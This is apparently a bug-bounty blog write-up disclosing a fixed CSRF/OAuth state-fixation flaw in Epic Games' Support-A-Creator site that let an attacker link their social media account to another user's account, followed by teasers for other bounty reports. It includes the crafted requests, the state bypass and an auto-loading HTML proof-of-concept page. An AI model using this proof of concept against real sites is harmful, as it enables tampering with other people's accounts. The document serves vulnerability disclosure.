Epic Games - Add your social media account to any epicgames account on https://sac.epicgames.com [CSRF Fixation]

-

 Company Information : 


Epic Games, Inc. is an American video game and software developer and publisher based in Cary, North Carolina. The company was founded by Tim Sweeney as Potomac Computer Systems in 1991, originally located in his parents' house in Potomac, Maryland.


Bug Category : 

CSRF Token Fixation : 

Devise contains a flaw that allows a remote, user-assisted attacker to conduct a CSRF token fixation attack. This issue is triggered as previous CSRF tokens are not properly invalidated when a new token is created. If an attacker has knowledge of said token, a specially crafted request can be made to it, allowing the attacker to conduct CSRF attacks.



Target  Information : 

https://sac.epicgames.com


Technical Details of the Bug : 

https://sac.epicgames.com is platform for social media influencers to show their work through their social media account and earn money. In order to register on this platform you need to have minimum 1000 followers. Linking Social media account flow is vulnerable to CSRF Attack which leads to add your social media account to any other epic games user account. This Attack works on Youtube , Twitch and VK.com integrations .


Product Details :

https://sac.epicgames.com The Support-A-Creator program : 
The Support-A-Creator program is an affiliate marketing program for streamers and social media content creators. 2Support-A-Creator gives creators the opportunity to receive real-money payout awards by creating content for Fortnite, 3Rocket League, and participating games in the Epic Games Store. Epic believes that content creators are an essential part 4of building communities around awesome games. We recognize how important content creators of all kinds have been to 5 our success, so we built this program to share in that success.

Vulnerable URL :

https://sac.epicgames.com/en-US/settings/socials

Vulnerable Flow :

1.CSRF Fixation :
https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=0.53be4wepkvg


This is the first request and it sends the authState value which will be fixed at server side. This will be checked in the final request.
Response : It will redirect you to auth provider for access.
https://accounts.google.com/o/oauth2/v2/auth?client_id=534123337821-krehgr4m7v7k51tl2d1brnemtktd2v30.apps.googleusercontent.com&redirect_uri=https%3A%2F%2Fsac.epicgames.com%2Fauth_callback&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fyoutube.readonly&state=0.53be4wepkvg&include_granted_scopes=true&response_type=code&access_type=offline&prompt=consent


2.Final Request : Once you give access to epicgames application from your oauth provider below request will be sent.

https://sac.epicgames.com/auth_callback?state=0.53be4wepkvg&code=4/0AVHEtk591HEMxNyW3Mie0h96mGQlq2Sm_DiHH1UljvSv5dlOOpi_kbZLK2tx8HFd9NHpGg&scope=https://www.googleapis.com/auth/youtube.readonly

As you can see authState parameter is same in all the request. So if you directly send the 2nd final request , server will reject it due to state validation error.

State token validation Bypass :

I you can put any value as authState like test,hack etc. and it will work same. so if you send the first request with the custom state and then send the final request with the same custom state , it will bypass the state validation. Ex : First send below request :
https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=anything


and then send the below final request:
https://sac.epicgames.com/auth_callback?state=anything&code=[Code]&scope=https://www.googleapis.com/auth/youtube.readonly

Then you can add your social media account to any other user account. with the help of

CSRF POC : (For youtube integration) :

<!DOCTYPE html> 2<html> 3 <head> 4 <title>Open links in new tabs and close them</title> 5 <script> 6 function openLinkA() { 7 window.open("https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=anything", "_blank"); 8 setTimeout(openLinkB, 5000); 9 setTimeout(closeTabs, 10000); 10 } 11 12 function openLinkB() { 13 window.open("https://sac.epicgames.com/auth_callback?state=anything&code=[Code]&scope=https://www.googleapis.com/auth/youtube.readonly", "_blank"); 14 setTimeout(closeTabs, 5000); 15 } 16 17 function closeTabs() { 18 window.close(); 19 } 20 </script> 21 </head> 22 <body onload="openLinkA()"> 23 <p>This page will automatically open links in new tabs and close them after a few seconds.</p> 24 </body> 25</html>

Put your code for validation.

Steps To Reproduce:

On order to reproduce the issue you will need 2 working accounts on https://sac.epicgames.com. But you can also test it while the registration process as the flow is same. I am taking example of youtube integration. 1.Login from test A account and go to socials account. Link : https://sac.epicgames.com/en-US/settings/socials 2.Now connect your youtube integration and intercept the request. 3.You will notice the first request . Now complete the process but intercept the final request mentioned above. 4.Now drop this request and copy the oauth code you got from youtube. 5.Now place it into the HTML POC mentioned. 6.Now login from Test B account and go to social Accounts. 7.Now run the above mentioned POC in another tab. 8.Now refresh the page and you will see Test A youtube account will be added in test B user account. You can reproduce this for Twitch and VK.com too.
##Video POC : 





Timeline : 



April 02th 2023: Report send to Epic Games Security Team through Hackerone.

April 10th 2023: Report Accepted and Triaged.

April 25th 2023: Complete issue was resolved and confirmed.

April 18th 2023: 1500$ Bounty Rewarded

Comments

Post a Comment

Popular posts from this blog

Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Image
Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...
Read more

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more